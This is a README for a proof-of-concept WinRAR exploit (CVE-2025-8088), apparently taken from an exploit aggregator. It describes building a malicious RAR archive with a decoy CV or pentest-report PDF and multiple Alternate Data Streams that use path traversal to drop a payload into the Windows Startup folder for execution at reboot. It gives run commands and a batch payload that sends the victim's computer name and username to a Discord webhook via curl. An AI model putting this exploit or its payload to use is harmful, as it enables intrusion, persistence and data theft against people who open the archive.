## https://sploitus.com/exploit?id=BDDB51A2-4860-5E0E-B73E-FE014DE6F032
# CVE-2025-8088 WinRAR Exploit ๐
A proof-of-concept exploit for WinRAR vulnerability (CVE-2025-8088) affecting versions 7.12 and lower. This tool creates a malicious RAR archive that embeds payloads in Alternate Data Streams (ADS) with path traversal, potentially leading to arbitrary code execution.
- The issue with a lot of the others is they do not embedd multiple ADS streams requiring either luck you have the right path traversal or know the exact username/extraction directory.
## ๐ How It Works
1. Creates a Decoy Document ๐ - Generates professional-looking PDF (CV or pentest report)
2. Embeds Multiple ADS Streams ๐ - Attaches payload streams with different path traversal depths
3. Manipulates RAR Headers โ๏ธ - Modifies archive structure to exploit path traversal vulnerability
4. Drops Payload to Startup ๐ - Attempts to write payload to Windows startup folder when extracted
## ๐ ๏ธ Usage
```bash
# Clone the repository
git clone https://github.com/techcorp/CVE-2025-8088-Exploit.git
cd best-CVE-2025-8088
# Install dependencies
pip install reportlab
# Run the exploit
python CVE-2025-8088-Exploit.py
```
## โ๏ธ Payload Customization
Edit the payload to call a Discord webhook:
```bash
# Replace the PAYLOAD variable in the script:
PAYLOAD = """@echo off
curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"Extracted on %COMPUTERNAME% by %USERNAME%\"}" YOUR_DISCORD_WEBHOOK_URL
pause
"""
```
Replace YOUR_DISCORD_WEBHOOK_URL with your actual webhook URL.
## ๐ Execution Flow
1. Victim extracts the RAR with vulnerable WinRAR (โค7.12)
2. Payload gets written to startup folder:
```bash
AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
```
3. On next reboot โก๏ธ payload executes automatically
## ๐ Requirements
- Windows OS ๐ช
- Python 3.x ๐
- WinRAR installed
- ReportLab library (pip install reportlab)